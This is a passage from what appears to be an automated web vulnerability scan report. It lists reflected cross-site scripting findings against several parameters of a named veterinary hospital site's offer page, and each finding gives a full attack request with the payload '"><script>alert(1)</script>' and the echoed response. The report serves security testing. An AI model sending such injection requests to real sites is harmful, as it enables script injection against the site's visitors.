d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.
vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:51 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=leokka2dvj8dli9epn3okqvbc4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=c6359"><script>alert(1)</script>440a5a05f49&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddre
...[SNIP]...

2.72. http://www.vcahospitals.com/main/offer/ [phone parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b5b4"><script>alert(1)</script>0df15c3c289 was submitted in the phone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=9b5b4"><script>alert(1)</script>0df15c3c289&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.
vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=4pt8m6oa7m32ci7i96uoh1kn01; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=9b5b4"><script>alert(1)</script>0df15c3c289&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d17
...[SNIP]...

2.73. http://www.vcahospitals.com/main/offer/ [referer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the referer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c43ae"><script>alert(1)</script>6f18be7751f was submitted in the referer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3Fc43ae"><script>alert(1)</script>6f18be7751f HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:14 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
rm action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3Fc43ae"><script>alert(1)</script>6f18be7751f" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.74. http://www.vcahospitals.com/main/offer/ [state parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the state request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce804"><script>alert(1)</script>ee024cf54a8 was submitted in the state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?=3&state=FLce804"><script>alert(1)</script>ee024cf54a8&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:59 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?=3&state=FLce804"><script>alert(1)</script>ee024cf54a8&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.75. http://www.vcahospitals.com/main/offer/ [submit parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b158"><script>alert(1)</script>2bba563e314 was submitted in the submit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon6b158"><script>alert(1)</script>2bba563e314&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.
vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:09 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ga94m4jju2j64t9htmvidu7h93; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon6b158"><script>alert(1)</script>2bba563e314&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26gui
...[SNIP]...

2.76. http://www.vcahospitals.com/main/offer/ [token parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the token request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be60f"><script>alert(1)</script>0efb51ecb80 was submitted in the token parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fdbe60f"><script>alert(1)</script>0efb51ecb80&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.
vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:15 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=s4bduitjbvoil74qo6fal13d00; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
lla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fdbe60f"><script>alert(1)</script>0efb51ecb80&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF
...[SNIP]...

2.77. http://www.vcahospitals.com/main/offer/ [tollfree parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the tollfree request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a5ed"><script>alert(1)</script>e20dadccfe7 was submitted in the tollfree parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-84161a5ed"><script>alert(1)</script>e20dadccfe7&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.
vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ads2nfd0qnf81gp16ap84q27u0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
ble%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-84161a5ed"><script>alert(1)</script>e20dadccfe7&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.19
...[SNIP]...

2.78. http://www.vcahospitals.com/main/offer/ [uri parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the uri request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a040b"><script>alert(1)</script>f73da84759e was submitted in the uri parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

